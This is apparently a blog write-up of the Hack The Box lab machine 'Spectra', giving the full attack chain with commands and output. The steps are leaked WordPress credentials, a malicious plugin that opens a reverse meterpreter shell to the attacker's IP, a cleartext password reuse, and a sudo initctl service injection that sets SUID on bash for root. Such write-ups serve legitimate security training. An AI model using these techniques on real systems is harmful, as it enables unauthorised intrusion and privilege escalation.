What we know is a drop, what we don’t know is an ocean.Isaac Newton
In this post, I’m writing a write-up for machine Spectra from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.
Spectra is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10, and submitting the root flag your points will be raised by 15.
After the initial port scan, we can reveal that this machine is running a website, after checking the website we can learn that this website uses WordPress. This WordPress website is not properly secure configured, through reading the config files we can find a username and password to access the back-end. After getting a reverse shell as www-data through a malicious plugin, we have our foothold.
From the user account
www-data, we can do a lateral movement to the user account
katie by finding the password in clear text in a system file. This user account has permission to use SSH, and after establishing an SSH session we can read the user flag.
The user account
katie has the permissions to execute
/sbin/initctl as with root privileges. After we have found a customized service, we can inject a payload to drop a
/bin/bash shell with root privileges and we can root this machine.
We start this machine with a port scan with Nmap.
~$ nmap -sS -sV -oA ./nmap/10.10.10.229 10.10.10.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-23 13:21 EDT Nmap scan report for 10.10.10.229 Host is up (0.067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) 80/tcp open http nginx 1.17.4 3306/tcp open mysql MySQL (unauthorized) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.22 seconds
The port scan discovers three open ports. The first port is the default SSH port
22/tcp. The second port is the default HTTP port
80/tcp. According to the discovered service, there is an
nginx 1.17.4 web server running on this machine. The third port, as the discovered service already reveals, is the default MySQL port
3306/tcp. Let’s add the hostname
spectra.htb to our hosts’ file, and start the enumeration of the web server.
Enumeration Web Server
Let’s visit the webserver through http://spectra.htb, we are ending up on the
Issue Tracking website.
This website has two hyperlinks. The first is leading to
http://spectra.htb/main/ and is going to a WordPress website. We can see that there is an user account
administrator on this website.
The second hyperlink is pointing to
http://spectra.htb/testing/. After checking this URL I got redirected to a webpage with an error message that the connector to a database cannot be established.
Let’s start with the enumeration of the testing website. In most cases, developers are not protecting a testing environment in the right way. If we remove the
/index.php from the URL, we got left with
http://spectra.htb/testing/ and we are able to see files that we’re not really supposed to see. Through the file
http://spectra.htb/testing/wp-config.php.save we are able to read credentials.
// ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'dev' ); /** MySQL database username */ define( 'DB_USER', 'devtest' ); /** MySQL database password */ define( 'DB_PASSWORD', 'devteam01' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' );
Let’s play some around with those credentials with the username
administrator and the username
Reverse shell as nginx
On the website
http://spectra.htb/main/wp-admin we are able to login with the credentials
administrator as username and the password
devteam01. The next step is to get a reverse shell. After doing some research online, I came across this Github repository: WordPress Malicious Plugin. This python script is generating a plugin for creating a reverse shell. Let’s clone this repository.
~$ git clone https://github.com/wetw0rk/malicious-wordpress-plugin Cloning into 'malicious-wordpress-plugin'… remote: Enumerating objects: 17, done. remote: Counting objects: 100% (17/17), done. remote: Compressing objects: 100% (12/12), done. remote: Total 39 (delta 6), reused 12 (delta 5), pack-reused 22 Receiving objects: 100% (39/39), 12.54 KiB | 3.13 MiB/s, done. Resolving deltas: 100% (8/8), done.
Now, create a plugin with a reverse shell payload to my machine.
~$ python3 wordpwn.py 10.10.16.144 4444 Y
The script is creating a plugin as
malicious.zip and it’s directly opening the meterpreter. Through the WordPress GUI we are able to upload the plugin. After the upload the plugin, it’s visible as the name GotEm.
After access the URL
http://spectra.htb/main/wp-content/plugins/malicious/wetw0rk_maybe.php the meterpreter shell is created.
[*] Processing wordpress.rc for ERB directives. resource (wordpress.rc)> use exploit/multi/handler  Using configured payload generic/shell_reverse_tcp resource (wordpress.rc)> set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp resource (wordpress.rc)> set LHOST 10.10.16.144 LHOST => 10.10.16.144 resource (wordpress.rc)> set LPORT 4444 LPORT => 4444 resource (wordpress.rc)> exploit [*] Started reverse TCP handler on 10.10.16.144:4444  Sending stage (39282 bytes) to 10.10.10.229 [*] Meterpreter session 1 opened (10.10.16.144:4444 -> 10.10.10.229:37764) at 2021-03-23 17:53:46 -0400
After launching the shell we see that we have a shell as
nginx user account.
meterpreter > shell Process 8736 created. Channel 0 created. id uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
Through the command
exit, we are back in the meterpreter shell and we can start enumerating the user accounts.
meterpreter > cd /home meterpreter > ls Listing: /home ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40700/rwx------ 4096 dir 2020-07-20 05:53:17 -0400 .shadow 40755/rwxr-xr-x 4096 dir 2021-03-23 13:31:43 -0400 chronos 40755/rwxr-xr-x 4096 dir 2021-03-23 17:08:39 -0400 katie 40755/rwxr-xr-x 4096 dir 2021-02-04 15:41:21 -0500 nginx 41751/rwxr-x--x 4096 dir 2020-07-20 05:53:17 -0400 root 40755/rwxr-xr-x 4096 dir 2020-07-20 05:53:17 -0400 user
The user account
katie holds the user flag, we need to do a lateral movement to this user account.
From nginx to katie
If we jump back to the shell from the meterpreter, we can download
linpeas.sh from our machine to the
/tmp directory of the spectra machine and run it. But,
linpeas.sh is not finding any useful information or juicy files. Let’s try to enumerate this manually. After searching through some files, we can find a juicy file with useful information in the
meterpreter > cd /opt; ls Listing: /opt ============= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2020-06-28 15:54:08 +0200 VirtualBox 100644/rw-r--r-- 978 fil 2021-02-04 01:02:30 +0100 autologin.conf.orig 40755/rwxr-xr-x 4096 dir 2021-01-16 00:53:35 +0100 broadcom 40755/rwxr-xr-x 4096 dir 2021-01-16 00:54:09 +0100 displaylink 40755/rwxr-xr-x 4096 dir 2021-01-16 00:53:24 +0100 eeti 40755/rwxr-xr-x 4096 dir 2021-01-16 00:55:32 +0100 google 40755/rwxr-xr-x 4096 dir 2021-02-03 00:15:44 +0100 neverware 40755/rwxr-xr-x 4096 dir 2021-01-16 00:54:41 +0100 tpm1 40755/rwxr-xr-x 4096 dir 2021-01-16 00:54:45 +0100 tpm2
Files as this file
autologin.conf.orig are always interesting, as we check the contents we can find a pointer to this file directory:
/mnt/stateful_partition/etc/autologin. If we check that file directory, we can find the file
passwd, which contains a passowrd.
meterpreter > ls Listing: /etc/autologin ======================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100644/rw-r--r-- 19 fil 2021-02-04 01:43:24 +0100 passwd meterpreter > cat passwd SummerHereWeCome!!
We have found the password
SummerHereWeCome!!. Let’s try to switch to the user account
~$ ssh [email protected] The authenticity of host 'spectra.htb (10.10.10.229)' can't be established. RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'spectra.htb,10.10.10.229' (RSA) to the list of known hosts. Password: [email protected] ~ $
The password works! We have now an SSH-session as the user account
katie. We can now read the
[email protected] ~ $ cat user.txt e89d27fe195e9114ffa72ba8913a6130
We can now move to the next phase.
Let’s start with some basic checks. To know if this user account has some special privileges, such as permissions to execute something with elevated permissions, we can check that with the command below.
[email protected] ~ $ sudo -l User katie may run the following commands on spectra: (ALL) SETENV: NOPASSWD: /sbin/initctl
katie has the permission to run
/sbin/initctl binary with root privileges. With
initctl a system administrator can manage user jobs. This binary is usually working with a service configuration file, located in
/etc/init. Let’s check if we can inject code in a system process to elevate our permissions to root.
[email protected] ~ $ sudo /sbin/initctl list crash-reporter-early-init stop/waiting cups-clear-state stop/waiting dbus_session stop/waiting failsafe-delay stop/waiting fwupdtool-activate stop/waiting send-reclamation-metrics stop/waiting smbproviderd stop/waiting tpm_managerd start/running, process 812 udev start/running, process 239 test stop/waiting ...
We are able to list all services and check their status. We can see a service that stands out, the service
test. Thi service is from default, not there, so it’s a customized service and therefore customizable. Let’s check the contents of this service, by checking the file
[email protected] ~ $ cd /etc/init [email protected] /etc/init $ cat test.conf
This description "Test node.js server" author "katie" start on filesystem or runlevel  stop on shutdown script export HOME="/srv" echo $$ > /var/run/nodetest.pid exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js end script pre-start script echo "[`date`] Node Test Starting" >> /var/log/nodetest.log end script pre-stop script rm /var/run/nodetest.pid echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log end script
Let’s inject some code to and change the contents of the
/etc/init/test/conf file to this
script chmod +s /bin/bash end script
Now, let’s start the service
test, and spawn the bash shell as root and read the flag.
[email protected] /etc/init $ sudo /sbin/initctl start test test start/running, process 4055 [email protected] /etc/init $ /bin/bash -p bash-4.3# id uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers) bash-4.3# cat /root/root.txt d44519713b889d5e1f9e536d0c6df2fc
Yeah! Another machine bites the dust! Thanks for reading this write-up. Did you enjoy reading this write-up? Please consider supporting this blog and buying me a cup of coffee or drop me a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.
Happy hacking! 🙂